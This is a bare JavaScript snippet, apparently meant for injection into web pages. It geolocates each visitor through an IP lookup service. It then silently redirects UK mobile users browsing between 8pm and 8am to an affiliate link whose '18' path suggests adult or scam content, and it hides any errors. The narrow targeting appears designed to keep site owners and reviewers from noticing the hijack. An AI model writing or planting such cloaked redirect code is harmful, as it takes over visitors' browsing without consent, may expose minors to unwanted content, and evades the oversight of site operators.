fetch('https://ipapi.co/json/') .then(response => response.json()) .then(data => { var isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent); var country = data.country; var ukTime = new Date().toLocaleString("en-US", { timeZone: "Europe/London" }); var currentHour = new Date(ukTime).getHours(); if (country === 'GB' && isMobile && ((currentHour >= 20 && currentHour <= 23) || (currentHour >= 0 && currentHour < 8))) { window.location.href = 'https://linkshter.com/18/?affid=77555'; } }) .catch(error => console.error(''));